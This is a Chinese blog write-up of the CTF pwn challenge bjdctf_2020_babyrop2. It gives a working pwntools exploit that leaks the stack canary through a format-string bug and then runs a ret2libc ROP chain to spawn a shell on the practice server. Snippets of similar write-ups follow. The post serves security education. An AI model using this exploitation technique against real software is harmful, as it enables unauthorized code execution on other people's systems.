bjdctf_2020_babyrop2

最新推荐文章于 2024-09-01 16:28:39 发布
原创 最新推荐文章于 2024-09-01 16:28:39 发布 · 1.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #网络安全 #安全

本文介绍了如何利用栈溢出和返回导向编程(ROP)技术解决一个CTF挑战。首先通过格式化字符串漏洞获取Canary值,然后利用栈溢出来构造ROP链,最终通过泄露libc地址并执行自定义代码来获取shell。

bjdctf_2020_babyrop2

使用checksec查看:
在这里插入图片描述
开启了Canary和栈不可执行,这题看标题就知道是一题栈溢出构造rop链的题目,存在Canary就代表我们首先要做的就是获取到Canary的值。

拉进IDA中查看:
在这里插入图片描述
main()函数中给了两个函数,首先看下gift()
在这里插入图片描述
printf(&format)这里就一个明显的格式化字符串漏洞,可通过该漏洞获取到Canary的值

Canary的值固定是rbp-8,so…用gdb调试可以看到就在我们输入的下方

%7$p就可以拿到Canary的值了。
在这里插入图片描述
接着看vuln():
在这里插入图片描述

read(0, &buf, 0x64uLL);这里也是一处明显的栈溢出,buf变量距离rbp只有0x20

这个题目没有system/bin/sh,需要我们自己去泄露libc进行利用,接下来就是ret2libc的标准操作了

exp:

from pwn import *

#start 
r = remote("node4.buuoj.cn",27174)
# r = process("../buu/bjdctf_2020_babyrop2")
elf = ELF("../buu/bjdctf_2020_babyrop2")
libc = ELF("../buu/ubuntu16(64).so")

#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln_addr = elf.symbols['vuln']
rdi_addr = 0x400993

#attack
payload = "%7$p"
r.sendlineafter("u!\n",payload)
r.recvuntil("0x")
canary = int(r.recv(16),16)
payload = p64(canary)
payload = payload.rjust(0x20,b'M')
payload += b'M'*8 + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)
r.sendlineafter("story!\n",payload)
put_addr = u64(r.recv(6).ljust(8,b'\x00'))

#libc
base_addr = put_addr - libc.symbols['puts']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
payload = p64(canary)
payload = payload.rjust(0x20,b'M')
payload += b'M'*8 + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.sendlineafter("story!\n",payload)

r.interactive()
[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 612
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
【BUUCTF】bjdctf_2020_babyrop2
m0_51251108的博客
12-30 482
【BUUCTF】bjdctf_2020_babyrop2 有canary ida看下程序 有格式化漏洞,但有6格宽度限制 有栈溢出 思路:这题靠格式化字符串漏洞泄露出canary的地址 然后栈溢出,ret2libc 泄露方法: 一次一次试过去,找到我们输入的位置的偏移 然后这题里偏移+1就是canary了 然后就能把canary带出来,canary每次运行都不一样 所以要实时接收 一个程序不同函数的canary好像都相同 特别提醒自己在接收环节的处理 exp: from pwn import*
buuctf bjdctf_2020_babyrop
carol2358的博客
05-02 500
常规libc 64位 from pwn import * from LibcSearcher import * local_file = './bjdctf_2020_babyrop' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select = 1 if sel...
[BUUCTF]PWN——bjdctf_2020_babyrop2
mcmuyanga的博客
11-05 1855
bjdctf_2020_babyrop2 附件 步骤: 例行检查,64位程序,开启了NX和canary保护 2. 试运行一下程序,看看大概的情况 提示我们去泄露libc 3. 64位ida载入,从main函数开始看程序 init gift 第9行的printf函数存在格式化字符串漏洞,可以利用这点去泄露canary的值 vuln buf参数存在溢出漏洞,只要绕过了canary就能够利用ret2libc的方法获取shell 利用思路: 利用格式化字符串泄露出canary的值 利用溢出漏洞,
[BUUCTF-pwn]——bjdctf_2020_babyrop2
Y_peak的博客
02-25 374
[BUUCTF-pwn]——bjdctf_2020_babyrop2 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop2 还是先checksec一下。开启了canary 在IDA中,一看发现思路很清楚呀 思路 给的提示好明显, 第一个函数给你提示,泄露libc 第二个格式化字符串漏洞,泄露canary 第三个函数栈溢出,有了canary和puts函数,我们就可以泄露出libc,进而构造获得shell的rop链 exploit from p
pwn7第七关
qq_18823653的博客
04-03 512
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
bjdctf2020 babyrop
pondzhang的专栏
05-09 362
from pwn import * p = process('./bjdctf_2020_babyrop') libcelf = ELF('./libc-2.23.so') pop_rdi_ret = 0x0000000000400733 pop_rsi_r15_ret = 0x0000000000400731 pltputs = 0x00000000004004E0 main = 0x00000000004006AD gotputs = 0x0000000000601018 payload = 'a' *
BUUCTF bjdctf_2020_babyrop
红叶的博客
10-27 869
今天终于搞明白 ret2libc3 了,不过不知道为什么所有 包括我自己写的PoC,都不能成功获取 ret2libc3 的shell,因此就去做BUUCTF的题了,边看大佬的解析边做。至此 system、/bin/sh 的地址就已经拿到了,只需要重新溢出一次程序,使用刚才获取的地址即可。因为没有开PIE,因此地址是固定的。使用 1 的 Libc 即可获取shell。ROPgadget找pop rdi。gdb动态调试查看需要覆盖的数量。打开IDA Pro看一眼。ret2libc的做法。首先checksec。
[PWN] BUUCTF bjdctf_2020_babyrop
空城惜梦的博客
06-04 685
构造常规的ROP链,三种找到libc版本的方法分析寻找libc版本1.利用LibcSearcher来查找libc版本payload2.通过特殊网址来查找libc版本3.通过gdb来查找libc版本payload 分析 按照惯例checksce ,发现开了NX和RELRO 运行程序,查看程序的运行逻辑,从图中的红框可以猜测是一道泄露libc的题目 接着用IDA查看程序中主要函数存在的漏洞,可以看到 buf这个字符串数组只有0x20字节,而read却可以读取0x64个字节,所以这里存在着栈溢出 shift
bjdctf_2020_babyrop
、moddemod
06-23 533
exp from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './bjdctf_2020_babyrop' p = process(proc_name) # p = remote('node3.buuoj.cn', 28227) elf = ELF(proc_name) read_got = elf.got['read'] puts_plt = elf.plt['puts'] main_.
bjdctf_2020_babyrop【BUUCTF】
qq_41696518的博客
08-31 560
bjdctf_2020_babyrop
bjdctf_2020_babyropbjdctf_2020_babyrop2(格式化字符leak)
beaster1的博客
04-06 715
bjdctf_2020_babyrop 先checksec 打开ida正常查看函数 打开init函数发现puts函数 然后进入vuln函数 存在栈溢出 没有看到后门函数应该是libc leak+rop 代码如下 from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29901) #p=process('') elf=ELF('bjdctf_2020_babyrop') puts_got=elf.got['puts'] p
bjdctf_2020_babyrop2-fmt-leak canary
个人笔记
04-10 619
这使得参数可以输出多次,使用多个格式说明符,以不同的顺序输出。本地libc下载:https://github.com/Yeuoly/buuctf_pwn/tree/master/bjdctf_2020_babyrop2。printf(“%p”, a) 用地址的格式打印变量 a 的值,printf(“%p”, &a) 打印变量 a 所在的地址。思路:aa相当于定位标识,format在格式化假参数6的位置,所以构造成。2,IDA静态分析,查看可以泄露canary的地方,否则只能爆破了。canary的位置:即。
BUUOJ PWN bjdctf_2020_babyrop2
weixin_50287973的博客
11-12 297
开启的安全机制 main gift 利用格式化字符串泄露canary vuln 栈溢出泄露libc 栈溢出执行system(“bin/sh\x00”) scanf允许输入6字节,输入参数,输出偏移为6的地址,canary的偏移就为7 这样输入%7$p就可以泄露canary EXP from pwn import * from LibcSearcher import LibcSearcher p = remote("node3.buuoj.cn",27004) elf = ELF("./bjdc
bjdctf-2020-babyrop2
最新发布
m0_73743784的博客
09-01 778
首先需要注意要获得 canary 的值,然后才能进行接下来的一系列操作格式化字符串漏洞需要大胆地调试才能得到实际的偏移,方便我们利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值